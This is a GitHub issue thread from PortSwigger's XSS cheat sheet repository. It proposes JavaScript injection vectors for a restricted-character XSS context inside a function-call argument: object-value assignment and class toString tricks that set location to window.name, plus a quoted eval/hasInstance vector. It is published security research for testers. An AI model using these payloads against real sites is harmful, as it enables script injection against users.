### ISSUE TITLE
Avoiding "Invalid left-hand side in assignment" using assignment in object values/new class+toString  

### ISSUE THREAD

**Issue by avlidienbrunn** [PortSwigger/xss-cheatsheet-data#49]
Hello!

There was some discussion on twitter regarding limited XSS within function calls:

```javascript
function blah(){}
blah("INJECTION_HERE")
```

If we can use ``` ` ```, ``` () ```, ``` ? ```, or ```,``` its covered by many of the examples.

If we can use ``` [] ```, its covered by ``` 'alert\x281\x29'instanceof{[Symbol.hasInstance]:eval} ``` (aka `No parentheses using ES6 hasInstance and instanceof with eval`)

However, if all those are unavailable (and maybe in other scenarios too), we can make use of:

**assignment in object values**
```javascript
function blah(){}
blah(""+{a:location=name}+"")
```
 
**new class + cast to string**
```javascript
function blah(){}
blah(""+new class b{toString=e=>location=name}+"")
```

I dont *think* the scenario of "stuck with Invalid left-hand side in assignment" + no ``` []()?,` ``` is covered, but its possible as described.

Regards,
@fransr and @avlidienbrunn

**Comment by hackvertor** [comment]
Hiya, yep this is probably worth adding to the cheat sheet under restricted characters. I'm happy to do this or you can create a PR cheers

**Comment by avlidienbrunn** [comment]
@hackvertor awesome, you can go ahead! Thanks!

**Comment by hackvertor** [comment]
@avlidienbrunn I've updated the cheat sheet with these vectors. They will be in the restricted characters section. It should be available on the PortSwigger website within the next few days. Cheers!
